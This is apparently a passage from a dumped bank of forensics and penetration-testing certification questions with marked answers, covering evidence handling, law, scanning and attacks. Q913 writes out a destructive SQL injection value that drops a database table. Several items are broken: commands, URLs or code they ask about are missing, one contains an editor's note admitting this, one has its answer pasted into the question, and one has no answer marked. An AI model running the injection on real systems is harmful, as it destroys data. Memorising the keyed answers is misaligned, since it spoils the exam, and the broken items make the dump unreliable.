A. EFS uses a 128-bit key that can't be cracked, so you will not be able to recover the information
B.
B. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information
Correct Answer
C.
C. The EFS Revoked Key Agent can be used on the Computer to recover the information
D.
D. When the encrypted file was copied to the floppy disk, the EFS private key was also copied, so you can recover the information
Question 863

When examining a hard disk without a write-blocker, you should not start Windows because Windows will write data to the:

A.
A. Recycle Bin
Correct Answer
B.
B. MSDOS.sys
C.
C. BIOS
D.
D. Case files
Question 864

You are called in to assist the police in a case involving a password-protected floppy disk. What are two common methods used by password cracking software to obtain the password?

A.
A. Limited force and library attack
B.
B. Brut Force and dictionary Attack
Correct Answer
C.
C. Maximum force and thesaurus Attack
D.
D. Minimum force and appendix Attack
Question 865

When reviewing web logs, you see an entry for 'resource not found' in the HTTP status code field. What is the actual error code you would see?

A.
A. 202
B.
B. 404
Correct Answer
C.
C. 505
D.
D. 909
Question 866

Volatile memory is a challenge for forensic analysis because data may disappear on shutdown. In a lab, which option is most appropriate to help capture this data?

A.
A. Use VMware to be able to capture the data in memory and examine it
B.
B. Give the Operating System a minimal amount of memory, forcing it to use a swap file
C.
C. Create a separate partition of several hundred megabytes and place the swap file there
Correct Answer
D.
D. Use intrusion forensic techniques to study memory resident infections
Question 867

What port do you send a fake email to on the company SMTP server?

A.
A. 10
B.
B. 25
Correct Answer
C.
C. 110
D.
D. 135
Question 868

This is the original file structure database that Microsoft designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.

A.
A. Master Boot Record (MBR)
B.
B. Master File Table (MFT)
C.
C. File Allocation Table (FAT)
Correct Answer
D.
D. Disk Operating System (DOS)
Question 869

What should you do when approached by a reporter about a case you are working on or have worked on?

A.
A. Refer the reporter to the attorney that retained you
Correct Answer
B.
B. Say, "no comment"
C.
C. Answer all the reporter's questions as completely as possible
D.
D. Answer only the questions that help your case
Question 871

Where did the incident response team go wrong in the case of the erased servers and zip disk?

A.
A. They examined the actual evidence on an unrelated system
B.
B. They attempted to implicate personnel without proof
C.
C. They tampered with evidence by using it
Correct Answer
D.
D. They called in the FBI without correlating with the fingerprint data
Question 872

Why is it important to view the contents of the page or swap file when investigating a Windows System?

A.
A. Windows stores all of the system's configuration information in this file
B.
B. This is the file that Windows uses to communicate directly with the Registry
C.
C. A large volume of data can exist within the swap file of which the computer user has no knowledge
Correct Answer
D.
D. This is the file that Windows uses to store the history of the last 100 commands run from the command line
Question 873

What is the correct sequence of events after securing the scene and shutting down the system during a hacking incident investigation?

A.
A. Connect the target media; prepare the system for acquisition; Secure the evidence; Copy the media
B.
B. Prepare the system for acquisition; Connect the target media; Copy the media; Secure the evidence
Correct Answer
C.
C. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media
D.
D. Secure the evidence; Prepare the system for acquisition; Connect the target media; Copy the media
Question 874

What does the use of warning banners help a company avoid by overcoming an employee’s assumed right?

A.
A. Right to work
B.
B. Right of free speech
C.
C. Right to Internet Access
D.
D. Right of Privacy
Correct Answer
Question 875

What does mactime, a part of the Coroner’s Toolkit, do?

A.
A. It traverses the file system and produces a listing of all files based on the modification, access and change timestamps
Correct Answer
B.
B. It can recover deleted file space and search it for data, but does not allow preview
C.
C. The tool scans for i-node information, which is used by other tools in the toolkit
D.
D. It is a tool specific to the MAC OS and forms a core component of the toolkit
Question 876

One way to identify the presence of hidden partitions on a suspect's hard drive is to:

A.
A. Add up the total size of all known partitions and compare it to the total size of the hard drive
Correct Answer
B.
B. Examine the FAT and identify hidden partitions by noting an H in the partition Type field
C.
C. Examine the LILO and note an H in the partition Type field
D.
D. It is not possible to have hidden partitions on a hard drive
Question 877

What information do you need to recover when searching a victim's computer for a crime committed with a specific email message?

A.
A. Internet service provider information
B.
B. E-mail header
Correct Answer
C.
C. Username and password
D.
D. Firewall log
Question 878

What would be the primary reason to recommend a disk imaging tool instead of a simple DOS copy of files?

A.
A. A disk imaging tool would check for CRC32s for internal self-checking and validation and have MD5 checksum
B.
B. Evidence file format will contain case data entered by the examiner and encrypted at the beginning of the evidence file
C.
C. A simple DOS copy will not include deleted files, file slack, and other information
Correct Answer
D.
D. There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the original will not match up sector for sector
Question 879

What prevents you from discussing a case with the CEO when employed directly by an attorney?

A.
A. The attorney-work-product rule
Correct Answer
B.
B. Good manners
C.
C. Trade secrets
D.
D. ISO 17799
Question 880

What can an investigator examine to verify that a file has the correct extension?

A.
A. The File Allocation Table
B.
B. The file header
Correct Answer
C.
C. The file footer
D.
D. The sector map
Question 881

Which organization maintains a database of hash signatures for known software?

A.
A. International Standards Organization
B.
B. Institute of Electrical and Electronics Engineers
C.
C. National Software Reference Library
Correct Answer
D.
D. American National Standards Institute
Question 882

The ____________________ refers to handing over the results of private investigations to the authorities because of indications of criminal activity.

A.
A. Locard Exchange Principle
B.
B. Clark Standard
C.
C. Kelly Policy
D.
D. Silver-Platter Doctrine
Correct Answer
Question 883

What should you do if an employer has no policy reserving the right to inspect computing assets?

A.
A. Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned
B.
B. Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment
C.
C. Inform the owner that conducting an investigation without a policy is a violation of the employee's expectation of privacy
Correct Answer
D.
D. Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies
Question 884

Can an employer file a criminal complaint with police if a corporate investigation reveals an employee is committing a crime?

A.
A. Yes, and all evidence can be turned over to the police
Correct Answer
B.
B. Yes, but only if you turn the evidence over to a federal law enforcement agency
C.
C. No, because the investigation was conducted without following standard police procedures
D.
D. No, because the investigation was conducted without warrant
Question 885

____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.

A.
A. Network Forensics
B.
B. Computer Forensics
Correct Answer
C.
C. Incident Response
D.
D. Event Reaction
Question 886

What is the name of the standard Linux command, also available as a Windows application, that can be used to create bit-stream images?

A.
A. mcopy
B.
B. image
C.
C. MD5
D.
D. dd
Correct Answer
Question 887

To preserve digital evidence, an investigator should ____________________

A.
A. Make two copies of each evidence item using a single imaging tool
B.
B. Make a single copy of each evidence item using an approved imaging tool
C.
C. Make two copies of each evidence item using different imaging tools
Correct Answer
D.
D. Only store the original evidence item
Question 888

Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?

A.
A. The manufacturer of the system compromised
B.
B. The logic, formatting and elegance of the code used in the attack
Correct Answer
C.
C. The nature of the attack
D.
D. The vulnerability exploited in the incident
Question 890

An expert witness may give an opinion if:

A.
A. The opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors
Correct Answer
B.
B. To define the issues of the case for determination by the finder of fact
C.
C. To stimulate discussion between the consulting expert and the expert witness
D.
D. To deter the witness from expanding the scope of his or her investigation beyond the requirements of the case
Question 891

When using Windows acquisition tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:

A.
A. Automate collection from image files
B.
B. Avoid copying data from the boot partition
C.
C. Acquire data from host-protected area on a disk
D.
D. Prevent contamination to the evidence drive
Correct Answer
Question 892

Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document. What is that code called?

A.
A. Globally unique ID
Correct Answer
B.
B. Microsoft Virtual Machine Identifier
C.
C. Personal Application Protocol
D.
D. Individual ASCII string
Question 894

You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?

A.
A. The X509 Address
B.
B. The SMTP reply Address
C.
C. The E-mail Header
Correct Answer
D.
D. The Host Domain Name
Question 895

You discover evidence that a subject is embezzling money from the company. The law enforcement officer requests that you put a network sniffer on the subject's computer. Why do you refuse?

A.
A. Violate your contract
B.
B. Cause network congestion
C.
C. Make you an agent of law enforcement
Correct Answer
D.
D. Write information to the subject's hard drive
Question 896

A law enforcement officer may only search for and seize criminal evidence with _______________________, which are facts or circumstances that would lead a reasonable person to believe a crime has been committed or is about to be committed, and evidence of the specific crime exists at the place to be searched.

A.
A. Mere Suspicion
B.
B. A preponderance of the evidence
C.
C. Probable cause
Correct Answer
D.
D. Beyond a reasonable doubt
Question 897

The police believe that Mevin Mattew has been obtaining unauthorized access to computers belonging to several companies. What is preventing the police from breaking down the suspect’s door and searching his home and seizing all his computer equipment if they have not yet obtained a warrant?

A.
A. The Fourth Amendment
Correct Answer
B.
B. The USA Patriot Act
C.
C. The Good Samaritan Laws
D.
D. The Federal Rules of Evidence
Question 898

When cataloging digital evidence, the primary goal is to

A.
A. Make bit-stream images of all hard drives
B.
B. Preserve evidence integrity
Correct Answer
C.
C. Not remove the evidence from the scene
D.
D. Not allow the computer to be turned off
Question 899

You are conducting an investigation involving complex text searches. Which tool allows you to efficiently search for a string within a file on the bitmap image of the target computer?

A.
A. Stringsearch
B.
B. grep
Correct Answer
C.
C. dir
D.
D. vim
Question 901

You become aware that a suspect is using ABC Company as their ISP. What assistance can the ISP provide?

A.
A. The ISP can investigate anyone using their service and can provide you with assistance
B.
B. The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant
Correct Answer
C.
C. The ISP can't conduct any type of investigations on anyone and therefore can't assist you
D.
D. ISPs never maintain log files so they would be of no use to your investigation
Question 902

A company’s web address leads to a pornographic site when typed in a browser, but the IP address works normally. What type of attack has likely occurred?

A.
A. ARP Poisoning
B.
B. DNS Poisoning
Correct Answer
C.
C. HTTP redirect attack
D.
D. IP Spoofing
Question 903

A school systems administrator gives you a simple backup copy of a student’s hard drive and requests you investigate for inappropriate images. What type of copy should you request to ensure completeness and admissibility of evidence?

A.
A. Bit-stream Copy
Correct Answer
B.
B. Robust Copy
C.
C. Full backup Copy
D.
D. Incremental Backup Copy
Question 904

Law enforcement officers legally search a location and observe unrelated evidence in plain view. What doctrine allows this evidence to be admissible?

A.
A. Plain view doctrine
Correct Answer
B.
B. Corpus delicti
C.
C. Locard Exchange Principle
D.
D. Ex Parte Order
Question 905

Microsoft Outlook maintains email messages in a proprietary format in what type of file?

A.
A. .email
B.
B. .mail
C.
C. .pst
Correct Answer
D.
D. .doc
Question 906

The efforts to obtain information before a trial by demanding documents, depositions, interrogatories, and examination of the scene is a description of what legal term?

A.
A. Detection
B.
B. Hearsay
C.
C. Spoliation
D.
D. Discovery
Correct Answer
Question 907

The rule of thumb when shutting down a system is to pull the power plug. However, what is a major drawback of this approach?

A.
A. Any data not yet flushed to the system will be lost
Correct Answer
B.
B. All running processes will be lost
C.
C. The /tmp directory will be flushed
D.
D. Power interruption will corrupt the pagefile
Question 908

You are assisting in an investigation of threatening emails. The complainant gives you printed copies of 27 emails. You inform her that you need access to the __________ to track the emails back to the suspect.

A.
A. Routing Table
B.
B. Firewall log
C.
C. Configuration files
D.
D. Email Header
Correct Answer
Question 909

Hackers can manipulate Windows Registry for various purposes. Which Registry Hive can be used to load an application at startup?

A.
A. HKEY_LOCAL_MACHINE\hardware\windows\start
B.
B. HKEY_LOCAL_USERS\Software|Microsoft\old\Version\Load
C.
C. HKEY_CURRENT_USER\Microsoft\Default
D.
D. HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run
Correct Answer
Question 910

Which of the following file systems is used by Mac OS X?

A.
A. EFS
B.
B. HFS+
Correct Answer
C.
C. EXT2
D.
D. NFS
Question 911

When running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

A.
A. Passive IDS
B.
B. Active IDS
Correct Answer
C.
C. Progressive IDS
D.
D. NIPS
Question 912

Simon, a former employee, tries to run axfr and ixfr commands using DIG. What is he attempting to do?

A.
A. Send DOS commands to crash the DNS servers
B.
B. Perform DNS poisoning
C.
C. Perform a zone transfer
Correct Answer
D.
D. Enumerate all the users in the domain
Question 913

What will the following SQL command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email = 'someone@somewhere.com'; DROP TABLE members; --

A.
A. Deletes the entire members table
Correct Answer
B.
B. Inserts the email address into the members table
C.
C. Retrieves the password for the first user in the members table
D.
D. This command will not produce anything since the syntax is incorrect
Question 914

You suspect firewall issues are preventing SNMP communication with remote offices. Which ports should be opened? (Select 2)

A.
A. 162
B.
B. 161
C.
C. 163
D.
D. 160
Question 915

You test a dynamic web page by inputting JavaScript into a search field and receive a pop-up saying: 'This is a test.' What does this indicate?

A.
A. Your website is vulnerable to CSS
Correct Answer
B.
B. Your website is not vulnerable
C.
C. Your website is vulnerable to SQL injection
D.
D. Your website is vulnerable to web bugs
Question 916

In IDLE scanning, if an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port, what will be the response?

A.
A. The zombie will not send a response
B.
B. 31402
C.
C. 31399
D.
D. 31401
Correct Answer
Question 917

Michael conducts an XMAS scan using Nmap and most of the ports do not respond. In what state are these ports?

A.
A. Closed
B.
B. Open
Correct Answer
C.
C. Stealth
D.
D. Filtered
Question 918

To comply with DoD policy, which requires allowing only incoming connections initiated internally, which type of firewall should be implemented?

A.
A. Packet filtering firewall
B.
B. Circuit-level proxy firewall
C.
C. Application-level proxy firewall
D.
D. Statefull firewall
Correct Answer
Question 919

Jessica wants to scan her network for live hosts using ICMP ECHO Requests. What type of scan is this?

A.
A. Tracert
B.
B. Smurf scan
C.
C. Ping trace
D.
D. ICMP ping sweep
Correct Answer
Question 920

You are passively footprinting a law firm's web servers. Which tool would you use?

A.
A. Ping sweep
B.
B. Nmap
C.
C. Netcraft
Correct Answer
D.
D. Dig
Question 921

After accessing a Cisco router's config file via a URL, what vulnerability have you discovered? http://172.168.4.131/level/99/exec/show/config

A.
A. HTTP Configuration Arbitrary Administrative Access Vulnerability
Correct Answer
B.
B. HTML Configuration Arbitrary Administrative Access Vulnerability
C.
C. Cisco IOS Arbitrary Administrative Access Online Vulnerability
D.
D. URL Obfuscation Arbitrary Administrative Access Vulnerability
Question 922

What is the command trying to verify? (Note: The actual command is missing but based on context)

A.
A. Verify that UDP port 445 is open for the 192.168.0.0 network
Correct Answer
B.
B. Verify that TCP port 445 is open for the 192.168.0.0 network
C.
C. Verify that NETBIOS is running for the 192.168.0.0 network
D.
D. Verify that UDP port 445 is closed for the 192.168.0.0 network
Question 923

Why were 14-character passwords cracked so quickly after a Group Policy change?

A.
A. Passwords of 14 characters or less are broken up into two 7-character hashes
Correct Answer
B.
B. A password Group Policy change takes at least 3 weeks to completely replicate throughout a network
C.
C. Networks using Active Directory never use SAM databases so the SAM database pulled was empty
D.
D. The passwords that were cracked are local accounts on the Domain Controller
Question 924

An 'idle' system is also referred to as what?

A.
A. PC not connected to the Internet
B.
B. Zombie
Correct Answer
C.
C. PC not being used
D.
D. Bot
Question 925

Larry plans to shut down a city's network using BGP devices and zombies. What type of penetration testing is he performing?

A.
A. Router Penetration Testing
B.
B. DoS Penetration Testing
Correct Answer
C.
C. Firewall Penetration Testing
D.
D. Internal Penetration Testing
Question 926

What can you infer from receiving an error message window after typing a quotation mark (?) in the username field on a website?

A.
A. SQL injection is possible
Correct Answer
B.
B. SQL injection is not possible
C.
C. The quotation mark (?) is a valid username
D.
D. The user for line 3306 in the SQL database has a weak password
Question 927

What information will John be able to gather from Hillary's computer by using Lophtcrack program and sending her an email with a malicious link?

A.
A. Hillary network username and password hash
Correct Answer
B.
B. The SID of Hillary network account
C.
C. The SAM file from Hillary's computer
D.
D. The network shares that Hillary has permissions
Question 928

Why do PDF passwords not offer maximum protection when sending through email?

A.
A. PDF passwords can easily be cracked by software brute force tools
Correct Answer
B.
B. PDF passwords are converted to clear text when sent through E-mail
C.
C. PDF passwords are not considered safe by Sarbanes-Oxley
D.
D. When sent through E-mail, PDF passwords are stripped from the document completely
Question 929

What could have prevented the theft of sensitive information from laptops that were stolen from Meyer Electronics Systems?

A.
A. EFS Encryption
Correct Answer
B.
B. DFS Encryption
C.
C. IPS Encryption
D.
D. SDW Encryption
Question 930

What networking protocol language should Kimberly learn that routers utilize?

A.
A. ATM
B.
B. UDP
C.
C. BPG
D.
D. OSPF
Correct Answer
Question 932

What IDS feature must George implement to meet the requirement of a 'time-based induction machine' in the state bill?

A.
A. Signature-based anomaly detection
B.
B. Pattern matching
C.
C. Real-time anomaly detection
Correct Answer
D.
D. Statistical-based anomaly detection
Question 933

Why does John not see any of the traffic produced by Firewalk after using a sniffer on a subnet inside his network?

A.
A. Firewalk cannot pass through Cisco firewalls
B.
B. Firewalk sets all packets with a TTL of zero
C.
C. Firewalk cannot be detected by network sniffers
D.
D. Firewalk sets all packets with a TTL of one
Correct Answer
Question 934

What countermeasure should George take to prevent DDoS attacks on his network?

A.
A. Enable direct broadcasts
B.
B. Disable direct broadcasts
Correct Answer
C.
C. Disable BGP
D.
D. Enable BGP
Question 935

Why is Nessus not recommended for a stealthy wireless scan?

A.
A. Nessus is too loud
Correct Answer
B.
B. Nessus cannot perform wireless testing
C.
C. Nessus is not a network scanner
D.
D. There are no ways of performing a 'stealthy' wireless scan
Question 936

At what layer of the OSI model do routers function on?

A.
A. 4
B.
B. 3
Correct Answer
C.
C. 1
D.
D. 5
Question 937

What organization should Frank submit the log to find out if it is a new vulnerability or not?

A.
A. APIPA
B.
B. IANA
C.
C. CVE
Correct Answer
D.
D. RIPE
Question 938

What filter should George use in Ethereal to monitor only SFTP traffic to and from his network?

A.
A. src port 23 and dst port 23
B.
B. udp port 22 and host 172.16.28.1/24
C.
C. net port 22
D.
D. src port 22 and dst port 22
Correct Answer
Question 939

Which feature will you disable to eliminate the ability to enumerate information about your Cisco routers?

A.
A. Border Gateway Protocol
B.
B. Cisco Discovery Protocol
Correct Answer
C.
C. Broadcast System Protocol
D.
D. Simple Network Management Protocol
Question 940

What is the smallest possible shellcode in Linux?

A.
A. 24 bytes
Correct Answer
B.
B. 8 bytes
C.
C. 800 bytes
D.
D. 80 bytes
Question 941

What kind of results did Jim receive from his vulnerability analysis when exploits were executed on systems deemed not exploitable?

A.
A. False negatives
Correct Answer
B.
B. False positives
C.
C. True negatives
D.
D. True positives
Question 942

Why would you want to initiate a DoS attack on a system you are testing as a penetration tester?

A.
A. Show outdated equipment so it can be replaced
B.
B. List weak points on their network
Correct Answer
C.
C. Use attack as a launching point to penetrate deeper into the network
D.
D. Demonstrate that no system can be protected against DoS attacks
Question 943

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.
A. Linux/Unix computers are easier to compromise
B.
B. Linux/Unix computers are constantly talking
C.
C. Windows computers are constantly talking
Correct Answer
D.
D. Windows computers will not respond to idle scans
Question 944

What operating system would respond to the following command?

A.
A. Windows 95
B.
B. FreeBSD
Correct Answer
C.
C. Windows XP
D.
D. Mac OS X
Question 945

What type of attack has the technician performed when they follow employees into restricted areas disguised as an electrician?

A.
A. Tailgating
Correct Answer
B.
B. Backtrapping
C.
C. Man trap attack
D.
D. Fuzzing
Question 946

What changes should the client company make based on the screenshot presented by Paulette during the audit?

A.
A. Remove any identifying numbers, names, or version information
Correct Answer
B.
B. The banner should have more detail on the version numbers for the network equipment
C.
C. The banner should not state 'only authorized IT personnel may proceed'
D.
D. The banner should include the Cisco tech support contact information as well
Question 948

What will the following URL produce in an unpatched IIS Web Server?

A.
A. Directory listing of C: drive on the web server
Correct Answer
B.
B. Insert a Trojan horse into the C: drive of the web server
C.
C. Execute a buffer flow in the C: drive of the web server
D.
D. Directory listing of the C:\windows\system32 folder on the web server
Question 949

What is kept in the following directory? HKLM\SECURITY\Policy\Secrets

A.
A. Cached password hashes for the past 20 users
B.
B. Service account passwords in plain text
Correct Answer
C.
C. IAS account names and passwords
D.
D. Local store PKI Kerberos certificates
Question 950

Where should Harold navigate on the computer to find the backup SAM file after running rdisk /s command?

A.
A. %systemroot%\system32\LSA
B.
B. %systemroot%\system32\drivers\etc
C.
C. %systemroot%\repair
Correct Answer
D.
D. %systemroot%\LSA
Question 951

What search string will you use to locate Microsoft Outlook Web Access Default Portal using Google search?

A.
A. allinurl:"exchange/logon.asp"
Correct Answer
B.
B. intitle:"exchange server"
C.
C. locate:"logon page"
D.
D. outlook:"search"
Question 952

When setting up a wireless network with multiple access points, why is it important to set each access point on a different channel?

A.
A. Multiple access points can be set up on the same channel without any issues
B.
B. Avoid over-saturation of wireless signals
C.
C. So that the access points will work on different frequencies
D.
D. Avoid cross talk
Correct Answer
Question 953

After normal working hours, you initiate a DoS attack against your external firewall and then initiate an FTP connection from an external IP. The FTP connection is successful even though FTP is blocked at the external firewall. What has happened?

A.
A. The firewall failed-bypass
B.
B. The firewall failed-closed
C.
C. The firewall ACL has been purged
D.
D. The firewall failed-open
Correct Answer
Question 954

How would you answer if asked about the methodology you will be using to test the company's network after passing your ECSA exam?

A.
A. Microsoft Methodology
B.
B. Google Methodology
C.
C. IBM Methodology
D.
D. LPT Methodology
Correct Answer
Question 955

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?

A.
A. Statefull firewalls do not work with packet filtering firewalls
B.
B. NAT does not work with statefull firewalls
C.
C. IPSEC does not work with packet filtering firewalls
D.
D. NAT does not work with IPSEC
Correct Answer
Question 956

Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Why will this not be viable to prosecute the intruder?

A.
A. Entrapment
Correct Answer
B.
B. Enticement
C.
C. Intruding into a honeypot is not illegal
D.
D. Intruding into a DMZ is not illegal
Question 957

You have compromised a lower-level administrator account on an Active Directory network of a small company. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?

A.
A. Poison the DNS records with false records
B.
B. Enumerate MX and A records from DNS
C.
C. Establish a remote connection to the Domain Controller
D.
D. Enumerate domain user accounts and built-in groups
Correct Answer
Question 958

What are the security risks of running a 'repair' installation for Windows XP?

A.
A. Pressing Shift+F10 gives the user administrative rights
Correct Answer
B.
B. Pressing Shift+F1 gives the user administrative rights
C.
C. Pressing Ctrl+F10 gives the user administrative rights
D.
D. There are no security risks when running the 'repair' installation for Windows XP
Question 959

Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet?

A.
A. Trick the switch into thinking it already has a session with Terri's computer
Correct Answer
B.
B. Poison the switch's MAC address table by flooding it with ACK bits
C.
C. Crash the switch with a DoS attack since switches cannot send ACK bits
D.
D. Enable tunneling feature on the switch
Question 960

You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position: 7+ years experience in Windows Server environment, 5+ years experience in Exchange 2000/2003 environment, Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i, and MYOB v3.4 Accounting software are required. MCSA desired, MCSE, CEH preferred. What is this information posted on the job website considered?

A.
A. Social engineering exploit
B.
B. Competitive exploit
C.
C. Information vulnerability
Correct Answer
D.
D. Trade secret
Question 961

The objective of this act was to protect consumers' personal financial information held by financial institutions and their service providers.

A.
A. Gramm-Leach-Bliley Act
Correct Answer
B.
B. Sarbanes-Oxley 2002
C.
C. California SB 1386
D.
D. HIPAA
Question 962

Why is it a good idea to perform a penetration test from the inside?

A.
A. It is never a good idea to perform a penetration test from the inside
B.
B. Because 70% of attacks are from inside the organization
Correct Answer
C.
C. To attack a network from a hacker's perspective
D.
D. It is easier to hack from the inside
Question 963

Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search. link:www.ghttech.net What will this search produce?

A.
A. All sites that ghttech.net links to
B.
B. All sites that link to ghttech.net
Correct Answer
C.
C. All search engines that link to .net domains
D.
D. Sites that contain the code: link:www.ghttech.net
Question 965

A packet is sent to a router that does not have the packet destination address in its route table, how will the packet get to its proper destination address?

A.
A. Root Internet servers
B.
B. Border Gateway Protocol
C.
C. Gateway of last resort
Correct Answer
D.
D. Reverse DNS
Question 966

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

A.
A. Smurf
Correct Answer
B.
B. Trinoo
C.
C. Fraggle
D.
D. SYN flood
Question 967

Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point?

A.
A. Buffer overflow
Correct Answer
B.
B. SQL injection
C.
C. Format string bug
D.
D. Kernel injection
Question 968

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?

A.
A. Polymorphic
B.
B. Metamorphic
Correct Answer
C.
C. Oligomorphic
D.
D. Transmorphic
Question 969

What is a good security method to prevent unauthorized users from 'tailgating'?

A.
A. Man trap
Correct Answer
B.
B. Electronic combination locks
C.
C. Pick-resistant locks
D.
D. Electronic key systems
Question 970

You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information?

A.
A. Airsnort
B.
B. Snort
C.
C. Ettercap
Correct Answer
D.
D. RaidSniff
Question 971

As a security analyst you set up a false survey website that will require users to create a username and a strong password. You send the link to all the employees of the company. What information will you be able to gather?

A.
A. The IP address of the employees' computers
B.
B. Bank account numbers and the corresponding routing numbers
C.
C. The employees' network usernames and passwords
Correct Answer
D.
D. The MAC address of the employees' computers
Question 973

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold's needs?

A.
A. Circuit-level proxy firewall
B.
B. Packet filtering firewall
C.
C. Application-level proxy firewall
Correct Answer
D.
D. Data link layer firewall
Question 974

What will the following command accomplish? (Test ability of a router to handle over-sized packets)

A.
A. Test ability of a router to handle over-sized packets
Correct Answer
B.
B. Test the ability of a router to handle under-sized packets
C.
C. Test the ability of a WLAN to handle fragmented packets
D.
D. Test the ability of a router to handle fragmented packets
Question 975

What does ICMP Type 3/Code 13 mean?

A.
A. Host Unreachable
B.
B. Administratively Blocked
Correct Answer
C.
C. Port Unreachable
D.
D. Protocol Unreachable
Question 978

Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that need improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?

A.
A. Block all internal MAC address from using SNMP
B.
B. Block access to UDP port 171
C.
C. Block access to TCP port 171
D.
D. Change the default community string names
Correct Answer
Question 979

After attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one of the servers. Why is that?

A.
A. RestrictAnonymous must be set to '10' for complete security
B.
B. RestrictAnonymous must be set to '3' for complete security
C.
C. RestrictAnonymous must be set to '2' for complete security
Correct Answer
D.
D. There is no way to always prevent an anonymous null session from establishing
Question 980

In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on 'bringing down the Internet'. Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves?

A.
A. The change in the routing fabric to bypass the affected router
Correct Answer
B.
B. More RESET packets to the affected router to get it to power back up
C.
C. RESTART packets to the affected router to get it to power back up
D.
D. STOP packets to all other routers warning of where the attack originated
Question 981

How many possible sequence number combinations are there in TCP/IP protocol?

A.
A. 1 billion
B.
B. 320 billion
C.
C. 4 billion
Correct Answer
D.
D. 32 million
Question 982

Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler's issue with his home wireless network?

A.
A. Computers on his wired network
B.
B. Satellite television
C.
C. 2.4GHz Cordless phones
Correct Answer
D.
D. CB radio
Question 983

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found?

A.
A. Web bug
Correct Answer
B.
B. CGI code
C.
C. Trojan.downloader
D.
D. Blind bug
Question 984

Williams, a forensic specialist, was investigating a system suspected to be involved in a cybercrime. Williams collected the required evidence, eliminated the root cause of the incident, and closed all attack vectors. In which phase of incident response did Williams perform these tasks?

A.
Post-incident activities
B.
Incident triage
C.
Eradication
Correct Answer
D.
Preparation for incident handling and response
Question 985

If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement?

A.
true
Correct Answer
B.
false